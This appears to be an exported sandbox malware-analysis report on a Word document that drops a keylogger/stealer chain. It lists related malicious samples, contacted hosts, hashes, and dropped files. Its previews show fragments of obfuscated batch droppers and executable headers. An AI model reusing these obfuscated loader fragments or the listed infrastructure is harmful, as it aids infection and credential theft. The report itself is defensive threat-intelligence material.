	UpdaterTool.exe	Get hash	malicious	Unknown	Browse
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	FORTUNE RICH_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
amazonenviro.com	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
api.telegram.org	Resource.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	user.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	UpdaterTool.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com	Get hash	malicious	Unknown	Browse	149.154.167.220
mail.techniqueqatar.com	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
checkip.dyndns.com	MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	FORTUNE RICH_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	http://t.me/hhackplus	Get hash	malicious	Unknown	Browse	149.154.167.99
	Resource.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	user.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	UpdaterTool.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
PUBLIC-DOMAIN-REGISTRYUS	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	http://www.technoafriwave.rw	Get hash	malicious	Unknown	Browse	207.174.214.183
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.115
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	YinLHGpoX4.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	103.53.42.63
	v4BET4inNV.vbs	Get hash	malicious	GuLoader	Browse	103.53.42.63
	InvoiceNr274728.pdf.lnk	Get hash	malicious	LummaC	Browse	208.91.198.106
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	119.18.54.39
UTMEMUS	MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	armv5l.elf	Get hash	malicious	Unknown	Browse	132.244.2.45
	31.13.224.14-x86-2025-01-03T22_14_18.elf	Get hash	malicious	Mirai	Browse	132.226.42.231
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	FACT0987789000900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	FORTUNE RICH_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	adguardInstaller.exe	Get hash	malicious	PureLog Stealer	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	U1P3u1tkB2.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	U1P3u1tkB2.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	9876567899.bat.exe	Get hash	malicious	Lokibot	Browse	149.154.167.220
	https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253D	Get hash	malicious	Unknown	Browse	149.154.167.220
	Mes_Drivers_3.0.4.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	c2.hta	Get hash	malicious	Remcos	Browse	149.154.167.220
	setup-avast-premium-x64.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	setup-avast-premium-x64.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	ZipThis.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\jphwmyiA.pif	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	HSBC_PAY.SCR.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse

Created / dropped Files

C:\Users\Public\Aiymwhpj.url

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Aiymwhpj.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	103
Entropy (8bit):	5.1888806884596175
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XM667ysbxEQDovo5v:HRYFVmTWDyzv6OExEsbx
MD5:	1E301D413230853278754C3057FF9EA5
SHA1:	F44FAA0C1EE8BF951C911B4C06346C5177E2D406
SHA-256:	0D0123EEA46FCA90B809B087EA9464C4C4F4476CAFB4F47305D0CBD2FD10D1B6
SHA-512:	5EBA303434E532938925CE01FBB2998519580F310A986076C15F8001014557DA91786E0B9EC8D73CF0855B1678029F1780B2485E70FF9F1E1D11F7241D2E064B
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Aiymwhpj.PIF"..IconIndex=954553..HotKey=7..

C:\Users\Public\AiymwhpjF.cmd

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15789
Entropy (8bit):	4.658965888116939
Encrypted:	false
SSDEEP:	384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
MD5:	CCE3C4AEE8C122DD8C44E64BD7884D83
SHA1:	C555C812A9145E2CBC66C7C64BA754B0C7528D6D
SHA-256:	4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
SHA-512:	EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
Malicious:	false
Preview:	.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

C:\Users\Public\Libraries\Aiymwhpj

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	data
Category:	dropped
Size (bytes):	587483
Entropy (8bit):	7.97941698770942
Encrypted:	false
SSDEEP:	12288:+cZzMs7baCyZxlymn17OtgtNXR1Fye2D69AEhIKb4u/k:+cpBbR+lyG17mgtNPae9XIA/k
MD5:	CBCC38C75EFFD12EDFBFE3A42776952D
SHA1:	15888D1A926BE2E5169CCF5B2C6C44149EA478A7
SHA-256:	43B4EDAED35A38B6304187C67BE1BEDA3F18769CDB06902BCFFB7BE597AC72A5
SHA-512:	7A45405A506D59FF89056388809C7EF11F09A2C04661DEE3C6E8C0F82E7C1E230F77B98D4CCC9F3996173ED848C38FC8379337313D4A13CCD1E76CAE4D2696C7
Malicious:	true
Preview:	.By.1.f.>...vB..X.'n...N.......B......-.$$....0....A.&&....-%.W..Ca..N..7b..R. +N..]..3X..X..HC.xF..T+.p4\|.R7.hAm.M.5.T{..J.Q.Y..g.X6...`.....Ol+..t.S.;...>^}0.m.0O.z9.yt.:..Q....K._...T.\|@...5......A......T!..x.uN......$$\..h..+^.....Bc.V.....H......}.N.q...9f.l...>RB....(".....]...d./ !o.[.....X..$$...!.....y-o9%.._^..f..Ih.W.A..S4..0...V..&$..V8..M..[76..N.O.\.e.#.t.V.D..gG.J...b0.e...g.0.r.@.N....W. .nx!Q.b....Z.^....3jiN..je#......:......L7..!...T+x@i..:'.H../&$.[.~.Y....h.[.. .x.....>&$%....+...,.R....K....Gz...........'..E\....W.Z....c.f..".'U7..1..SF...5J.\|1..1M.r4.9.A.}Y.%.J.`....o.2k.Ecr.=u.=Uu....mm.5.-.q..=.$$~....GhAh..j-.....g..d....d.........+..... .....7.).j..It4..%G...w..d.l.i.R.S..p/.+.8.jz.>.E...P.[.{..]).%b:.x3x,....-.:&$..Kz.C/.r.}&$)=.\|U..Ca..g.$&.j..C..Q+.ey..KL..)pI....%.+....B..=..m.\C.i5....u.... k...O..l..8......,.....C.....}6......-Y.5....=...p..H.."@...N..s.>....1%..lm.......G.e....].(h.\|.9x-%;..]pN.

C:\Users\Public\Libraries\Aiymwhpj.PIF

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1161216
Entropy (8bit):	7.188493218292404
Encrypted:	false
SSDEEP:	24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
MD5:	483AB6BD562B28782D0999ABEC4F57F5
SHA1:	B758556AF2B98708B97A6C3BDBD1E9F2905ED690
SHA-256:	E5393C34240B7E1B8A35052D7E151C324A4AA6424B5A6E1A45717157042FB9AB
SHA-512:	6F3F60153B3C4B1A780C80D59A4E17D8C109F57A1380F73B50498AC85A081B804D0F7C0FFADE4AC193656B3135DEDDDCD607121D9571B4C3BAF34103E36D129D
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................@...................@...........................P..n&... ...........................\|..................................................TW...............................text............................... ..`.itext..H........................... ..`.data...@........ ..................@....bss.....6...............................idata..n&...P...(..................@....tls....4................................rdata..............................@..@.reloc...\|.......~..................@..B.rsrc........ ......................@..@.............@......................@..@................................................................................................

C:\Users\Public\Libraries\FX.cmd

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	8556
Entropy (8bit):	4.623706637784657
Encrypted:	false
SSDEEP:	192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
MD5:	60CD0BE570DECD49E4798554639A05AE
SHA1:	BD7BED69D9AB9A20B5263D74921C453F38477BCB
SHA-256:	CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
SHA-512:	AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
Malicious:	true
Preview:	@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

C:\Users\Public\Libraries\NEO.cmd

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
Category:	dropped
Size (bytes):	46543
Entropy (8bit):	4.705001079878445
Encrypted:	false
SSDEEP:	768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
MD5:	637A66953F03B084808934ED7DF7192F
SHA1:	D3AE40DFF4894972A141A631900BD3BB8C441696
SHA-256:	41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
SHA-512:	2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
Malicious:	false
Preview:	@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

C:\Users\Public\Libraries\jphwmyiA.pif

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	175800
Entropy (8bit):	6.631791793070417
Encrypted:	false
SSDEEP:	3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
MD5:	22331ABCC9472CC9DC6F37FAF333AA2C
SHA1:	2A001C30BA79A19CEAF6A09C3567C70311760AA4
SHA-256:	BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
SHA-512:	C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: yxU3AgeVTi.exe, Detection: malicious, Browse Filename: ITT # KRPBV2663 .doc, Detection: malicious, Browse Filename: PI ITS15235.doc, Detection: malicious, Browse Filename: PO#5_Tower_049.bat, Detection: malicious, Browse Filename: HSBC_PAY.SCR.exe, Detection: malicious, Browse Filename: PO_B2W984.com, Detection: malicious, Browse Filename: image.exe, Detection: malicious, Browse Filename: PO_KB#67897.cmd, Detection: malicious, Browse Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Detection: malicious, Browse Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............\|..8...,...@...@..@

C:\Users\user\AppData\Local\Temp\~DF31826F4761D0A9B6.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$Q-0092025.doc

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.673088710516744
Encrypted:	false
SSDEEP:	3:klt+lllNLSlFCwgEpXn/lfllXzNTwT:7tZWQI5nl9wT
MD5:	7E8521D9EE8318F43D09C8238D8A8A29
SHA1:	124611AFEF8081FD595D59DAF7A7D204DEE4DEDD
SHA-256:	90950B656E94181855D11780B6D6058B9BF5A2DCAE690168B8A8AE0F75B157B5
SHA-512:	B4192479A271BB12FAD534D74F891A3E0BAE1D9A0993D47A0DB42580798E2BC5B28B992E9A401B79C411B03D388E9B2C1F4A8AD3169BAF9CA8999BEA231A838A
Malicious:	false
Preview:	.user.................................................a.l.f.o.n.s...h.......Q............a.i............................................5...%..}..i.........=.i

C:\Windows\SysWOW64\brightness.exe

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1161216
Entropy (8bit):	7.188493218292404
Encrypted:	false
SSDEEP:	24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
MD5:	483AB6BD562B28782D0999ABEC4F57F5
SHA1:	B758556AF2B98708B97A6C3BDBD1E9F2905ED690
SHA-256:	E5393C34240B7E1B8A35052D7E151C324A4AA6424B5A6E1A45717157042FB9AB
SHA-512:	6F3F60153B3C4B1A780C80D59A4E17D8C109F57A1380F73B50498AC85A081B804D0F7C0FFADE4AC193656B3135DEDDDCD607121D9571B4C3BAF34103E36D129D
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................@...................@...........................P..n&... ...........................\|..................................................TW...............................text............................... ..`.itext..H........................... ..`.data...@........ ..................@....bss.....6...............................idata..n&...P...(..................@....tls....4................................rdata..............................@..@.reloc...\|.......~..................@..B.rsrc........ ......................@..@.............@......................@..@................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: GRACE, Template: Normal.dotm, Last Saved By: GRACE, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Tue Jan 7 08:57:00 2025, Last Saved Time/Date: Tue Jan 7 08:57:00 2025, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Entropy (8bit):	7.058184259014953
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	ENQ-0092025.doc
File size:	146'944 bytes
MD5:	3db6baf168cecc916012a59b6530175a
SHA1:	7d74c680b09f982271a50483ce350a5b3d9a0996
SHA256:	96882b077a607f34cd963461341d728982e2075ffd4891f1b91e915da904cfe0
SHA512:	5a4b22f622559b8db815b1dc8cfa206eb433e55541de7d2540bd786703a0a418d03d1b657bcbdf9ceff74c863a1c7e4d324e3a555fd66d0905034ccdf5d677c5
SSDEEP:	1536:F7dgmjjy2lQkySTUb2roegTK+g9WomfaQjSqttJnkL5mS9kBwNR42qe3/w:FZPjbTU+J799IjSqtteL5N9kBF27
TLSH:	AEE3C447A9458B43E03493B5BE435FAD2F197E0CA9866AEF11273E9B3D302324D4E16D
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	35e1cc889a8a8599

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "ENQ-0092025.doc"

Indicators

Has Summary Info:
